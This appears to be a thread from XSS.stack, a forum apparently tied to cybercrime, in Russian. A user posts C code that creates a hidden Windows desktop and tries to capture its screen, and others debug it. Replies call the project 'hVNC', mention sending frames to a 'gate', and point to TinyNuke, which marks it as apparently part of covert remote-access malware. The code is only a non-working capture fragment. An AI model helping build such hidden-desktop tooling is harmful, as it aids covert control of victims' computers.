• XSS.stack #1 – первый литературный журнал от юзеров форума

Проблема с vnc

Jurddox

RAID-массив
Забанен
Реакции
4
Пожалуйста, обратите внимание, что пользователь заблокирован
Всем привет, вот функция которая должна получать пискли созданного нового рабочего стола:
#include <windows.h>

int main()
{
HDESK g_hDesk;
BITMAPINFOHEADER g_sImageInfo = {};
char* g_pImageBits = 0;

g_hDesk = OpenDesktopA("novij rabochij stol", 0, TRUE, GENERIC_ALL);
if (!g_hDesk)
g_hDesk = CreateDesktopA("novij rabochij stol", NULL, NULL, 0, GENERIC_ALL, NULL);
SetThreadDesktop(g_hDesk);

HWND hWnd = GetDesktopWindow();

RECT rc;
GetClientRect(hWnd, &rc);
int cx = rc.right - rc.left;
int cy = rc.bottom - rc.top;

if (!g_pImageBits || (g_sImageInfo.biWidth != cx) || (g_sImageInfo.biHeight != cy))
{
if (g_pImageBits)
free(g_pImageBits);

int line = cx * 4;
int size = cy * line;
g_pImageBits = (char*)malloc(size);

g_sImageInfo.biSize = sizeof(g_sImageInfo);
g_sImageInfo.biWidth = cx;
g_sImageInfo.biHeight = cy;
g_sImageInfo.biPlanes = 1;
g_sImageInfo.biBitCount = 32;
g_sImageInfo.biCompression = BI_RGB;
g_sImageInfo.biSizeImage = size;
}

HDC hDc = GetDC(NULL);
HDC hMemDc = CreateCompatibleDC(hDc);
HBITMAP hMemBitmap = CreateCompatibleBitmap(hDc, cx, cy);
HBITMAP hOldBitmap = (HBITMAP)SelectObject(hMemDc, hMemBitmap);
BitBlt(hMemDc, 0, 0, cx, cy, hDc, rc.left, rc.top, SRCCOPY);
SelectObject(hMemDc, hOldBitmap);
GetDIBits(hDc, hMemBitmap, 0, cy, g_pImageBits, (BITMAPINFO*)&g_sImageInfo, DIB_RGB_COLORS);
DeleteObject(hMemBitmap);
DeleteDC(hMemDc);
ReleaseDC(hWnd, hDc);
}
g_pImageBits равняется NULL после выполнения функции

g_pImageBits равняется NULL после выполнения функции
А до выполнения, она не NULL? Запусти отладчик и постмотри, на каком этапе она становится NULL, вполне вероятно, что она и не маллочится, так как в winapi функции нет нигде того, что могло бы эту переменную установить в NULL. Возможно cx или cy равен нулю, или что-то в таком духе.

А до выполнения, она не NULL? Запусти отладчик и постмотри, на каком этапе она становится NULL, вполне вероятно, что она и не маллочится, так как в winapi функции нет нигде того, что могло бы эту переменную установить в NULL. Возможно cx или cy равен нулю, или что-то в таком духе.
cx и cy с ними все норм, это разрешения экрана. g_pImageBits - я чекал ее длину через strlen, возвращает 0

g_pImageBits - я чекал ее длину через strlen, возвращает 0
Лол, что? Ты в курсе, что это не строка, а бинарные данные, если у тебя в бинарных данных первый байт нулевой, то поздравляю, strlen вернет 0.

Лол, что? Ты в курсе, что это не строка, а бинарные данные, если у тебя в бинарных данных первый байт нулевой, то поздравляю, strlen вернет 0.
Да это исключено. Я пробовал получать пиксели из текущего рабочего стола пользователя, там strlen возвращал норм длину. Да и все пиксели рисовались в окно

Да это исключено.
Что исключено? Использовать strlen для определения длины в корне не правильно, первый пиксель, который будет иметь 0 в любом из компонентов RGB обрежет твою длину. Это просто смешно.

К тому же о чем мы вообще говорим? У тебя уже есть длина данных в переменной size.

Практически все функции, которые ты используешь могут возвращать ошибку. Если что-то не работает, определи какая из них не отработала и получи код ошибки.

Я глянул в g_pImageBits действительно ничего не пишется GetDIBits после выполнения этой функции

Я глянул в g_pImageBits действительно ничего не пишется GetDIBits после выполнения этой функции
Еще раз, тебе нужно проверять результаты winapi функций, которые ты вызываешь. Любая из этих функций могла зафейлить и вернуть нулевой хендл там например, после чего все остальные вызовы идут по пизде.

возможно трабл где-то в коде, а именно, ты не обнуляешь структуру и там во время компиляции могут быть произвольные значения
RECT rc.

А вообще, как сказали выше, что мешает трассировать фукнции и смотреть их значения?

возможно трабл где-то в коде, а именно, ты не обнуляешь структуру и там во время компиляции могут быть произвольные значения
RECT rc.

А вообще, как сказали выше, что мешает трассировать фукнции и смотреть их значения?
Функция GetDIBits возвращает не 0, а высоту экрана, как было сказано в документации. Однако функция BitBit возвращает 0.
bandicam 2021-01-04 11-50-32-562.jpg

Вот что творится после выполнения функции GetDIBits. Видно, то что g_pImageBits - пустая

Еще раз, тебе нужно проверять результаты winapi функций, которые ты вызываешь. Любая из этих функций могла зафейлить и вернуть нулевой хендл там например, после чего все остальные вызовы идут по пизде.
Функция BitBit возвращает 0, GetLastError возвращает код ошибки 6, а это означает то, что дескриптор не нейден

Функция BitBit возвращает 0, GetLastError возвращает код ошибки 6, а это означает то, что дескриптор не нейден
Он не не найден, он не валиден. Возможно стоит делать GetDC(hWnd), но вряд ли поможет. На stackoverflow задай этот вопрос, возможно нужно какие-то еще действия проводить для переключения десктопа для потока, я хз.

попробуй оптимизировать свой код, через DIBSection, там буфер связанный BITMAPINFO и pData в глобальной области для твоей структуры. Его размеры действительны будут достаточно долгое время. Тебе нужно следить за изменениями в разрешение экрана, обрабатывая сообщения WM_DISPLAYCHANGE

попробуй оптимизировать свой код, через DIBSection, там буфер связанный BITMAPINFO и pData в глобальной области для твоей структуры. Его размеры действительны будут достаточно долгое время. Тебе нужно следить за изменениями в разрешение экрана, обрабатывая сообщения WM_DISPLAYCHANGE
ты имеешь ввиду вызывать функцию CreateDIBSection?

Он не не найден, он не валиден. Возможно стоит делать GetDC(hWnd), но вряд ли поможет. На stackoverflow задай этот вопрос, возможно нужно какие-то еще действия проводить для переключения десктопа для потока, я хз.
Я задал вопрос на stackoverflow. Написали то что вызывать функцию SwitchDesktop, тем самым делая текущим созданный рабочий стол. Я попробовал это сделать, но после запуска становится белый экран, но этого следовало ожидать

Без обид ТС, но мне кажется, ты не осилишь хвнц. То, что написал - это даже не начало. Потом надо ещё рисовать, сжимать, отправлять на гейт, там рисовать и т.д.

Лучше возьмись за внц. Как раз самое то, чтоб понять как все примерно устроено

Без обид ТС, но мне кажется, ты не осилишь хвнц. То, что написал - это даже не начало. Потом надо ещё рисовать, сжимать, отправлять на гейт, там рисовать и т.д.
Это все есть в TinyNuke

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх